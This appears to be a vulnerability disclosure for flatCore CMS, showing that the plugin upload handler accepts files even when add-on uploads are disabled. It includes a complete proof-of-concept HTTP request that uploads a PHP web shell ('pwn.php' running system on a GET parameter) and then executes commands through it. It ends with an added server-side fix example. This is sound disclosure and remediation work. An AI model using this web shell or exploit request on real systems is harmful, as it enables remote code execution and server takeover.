Unrestricted Upload of File with Dangerous Type in flatcore/flatcore-cms
Valid
Reported on
Oct 12th 2021
Description
Even with $fc_upload_addons = false, an attacker can still upload files by sending the POST request directly, because the upload handler itself does not enforce the setting.
Proof of Concept
1. Enable $fc_upload_addons = true.
2. Start uploading a PHP file, but do not send the request yet.
3. Disable the option again by setting $fc_upload_addons = false.
4. Send the file upload request. The file is still written to the upload/plugins directory.
The following request uploads a malicious PHP script onto the server:
```http
POST /flatCore-CMS/acp/core/files.upload-script.php HTTP/1.1
Host: 10.0.2.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------167305252220314413616184565
Content-Length: 516
Origin: http://10.0.2.15
Connection: close
Referer: http://10.0.2.15/flatCore-CMS/acp/acp.php?tn=moduls&sub=u&plg=zipslip.zip
Cookie: acptheme=dark; PHPSESSID=6ffjvvcureq3dkrb4vco57bq6f

-----------------------------167305252220314413616184565
Content-Disposition: form-data; name="upload_type"

plugin
-----------------------------167305252220314413616184565
Content-Disposition: form-data; name="csrf_token"

acd4ba1989b9845c1de2364dcd3450cc
-----------------------------167305252220314413616184565
Content-Disposition: form-data; name="file"; filename="pwn.php"
Content-Type: application/x-php

<?php
system($_GET["cmd"]);
?>
-----------------------------167305252220314413616184565--
```
5. Go to http://10.0.2.15/flatCore-CMS/upload/plugins/pwn.php?cmd=id to execute the malicious PHP script.
Impact
This vulnerability allows remote code execution with admin privileges.
Recommended Fix
This occurs because files.upload-script.php does not check that $fc_upload_addons is true before accepting the upload. The check has to be enforced in the upload handler on the server side; gating only the admin UI does nothing against a replayed request.
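The following is an added illustration of what that server-side guard could look like. It is not flatCore's own code: only the flag name $fc_upload_addons and the upload/plugins directory come from the report, while the function name, the allowed-extension list and the handler wiring are assumptions made for the example.

```php
<?php
// Added example, not flatCore's code. $fc_upload_addons and the
// upload/plugins path come from the report; everything else is assumed.

declare(strict_types=1);

/**
 * Decide whether an add-on upload may proceed.
 * Returns null when the upload is acceptable, or a short reason when it
 * must be refused.
 */
function validate_addon_upload(bool $fc_upload_addons, array $file, array $allowed = ['zip']): ?string
{
    // 1. Enforce the feature flag here, in the handler. Hiding the upload
    //    form in the admin UI is not a control: the request can be replayed.
    if (!$fc_upload_addons) {
        return 'addon uploads are disabled';
    }

    // 2. Basic sanity on the $_FILES record.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'upload error';
    }

    // 3. Allow-list the extension; the client-supplied Content-Type is
    //    untrusted and ignored.
    $name = basename((string) ($file['name'] ?? ''));
    $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if ($name === '' || !in_array($ext, $allowed, true)) {
        return 'file type not allowed';
    }

    // 4. Refuse any inner extension a web server might execute
    //    (e.g. "shell.php.zip" on a server with sloppy handler mapping).
    foreach (explode('.', $name) as $part) {
        if (preg_match('/^ph(p\d?|tml|ar)$/i', $part)) {
            return 'file name contains an executable extension';
        }
    }

    return null;
}

// Handler wiring, assumed for the example; in the CMS the flag would come
// from its configuration file.
$fc_upload_addons = false;

if (isset($_FILES['file'])) {
    $reason = validate_addon_upload($fc_upload_addons, $_FILES['file']);
    if ($reason !== null) {
        http_response_code(403);
        header('Content-Type: application/json');
        echo json_encode(['error' => $reason]);
        exit;
    }
    // Store under a server-chosen name; the client's filename is never used
    // as the destination path.
    $dest = __DIR__ . '/../upload/plugins/' . bin2hex(random_bytes(8)) . '.zip';
    if (!move_uploaded_file($_FILES['file']['tmp_name'], $dest)) {
        http_response_code(500);
        exit;
    }
}
```

With the flag set to false, the request from the proof of concept is refused with a 403 before anything is written; with it set to true, "pwn.php" is still rejected at step 3 because only the allow-listed archive extension is accepted. Serving upload/plugins from a location the web server does not execute scripts from is a useful second layer, but it does not replace the check in the handler.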